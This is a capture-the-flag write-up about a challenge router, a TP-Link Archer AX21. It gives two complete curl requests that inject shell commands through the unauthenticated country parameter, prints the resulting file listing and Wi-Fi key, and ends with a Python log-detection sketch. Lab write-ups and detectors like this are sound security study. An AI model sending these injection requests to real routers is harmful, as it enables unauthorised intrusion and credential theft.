Oi! I’m JJ - love rock, metal, and punk, and yeah, I take BTC. Skeletor’s my hero, no shame there.
Those bloody gnomes have wrecked the neighborhood’s Wi-Fi - changed the admin password, messed up all the settings, the whole lot. Now I can’t even get online!
We own this router, so we’re just taking back what’s ours.
Task: Hack past the gnomes’ chaos and restore access to the Wi-Fi network.
First we access the router's web console https://dosis-network-down.holidayhackchallenge.com/ and note the version information:
Firmware Version: 1.1.4 Build 20230219 rel.69802
Hardware Version: Archer AX21 v2.0
A quick search of Exploit-DB shows there may be a working exploit for this firmware version, see https://www.exploit-db.com/exploits/51677
Instead of using the pre-built exploit, which requires a reverse shell, we build the same request in curl:
curl --get 'https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale' --data-urlencode 'form=country' --data-urlencode 'operation=write' --data-urlencode 'country=$(find)' -i -s
...
./etc/config
./etc/config/dhcp
./etc/config/firewall
./etc/config/leds
./etc/config/network
./etc/config/system
./etc/config/wireless
...
We look at some of the config files until we find the right one, and immediately we have the WiFi password:
curl --get 'https://dosis-network-down.holidayhackchallenge.com/cgi-bin/luci/;stok=/locale' --data-urlencode 'form=country' --data-urlencode 'operation=write' --data-urlencode 'country=$(cat /etc/config/wireless)' -i -s
...
config wifi-iface 'default_radio0'
    option device 'radio0'
    option network 'lan'
    option mode 'ap'
    option ssid 'DOSIS-247_2.4G'
    option encryption 'psk2'
    option key 'SprinklesAndPackets2025!'
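From the defender's side, the two requests above leave a recognisable trace in an access log: a call to the locale endpoint with form=country, an empty stok, and a country value that is not a country code. The following detection sketch is an added example, not part of the original write-up; the combined log format, the sample log lines and the two-letter country code rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate country value is a two-letter uppercase code.
COUNTRY_OK = re.compile(r"[A-Z]{2}")
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def inspect_request(target):
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not (parts.path.startswith("/cgi-bin/luci/") and parts.path.endswith("/locale")):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if query.get("form") != ["country"]:
        return []
    findings = []
    if ";stok=/" in parts.path:
        findings.append("empty stok (no session token)")
    for value in query.get("country", []):
        if not COUNTRY_OK.fullmatch(value):
            findings.append(f"non-country value in country parameter: {value!r}")
    return findings


def scan_log(lines):
    """Return (line number, findings) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = inspect_request(match.group(1))
            if findings:
                hits.append((number, findings))
    return hits


# Constructed sample log lines (documentation IP addresses, made-up token).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2025:10:00:01 +0000] "GET /cgi-bin/luci/;stok=0123abcd/locale?form=country&operation=write&country=DE HTTP/1.1" 200 31',
    '198.51.100.9 - - [10/Dec/2025:10:02:13 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28find%29 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Dec/2025:10:03:40 +0000] "GET /webpages/index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(findings)}")
```

The same allowlist check on the country value, applied before the request reaches the router's web interface, rejects both requests shown in this write-up.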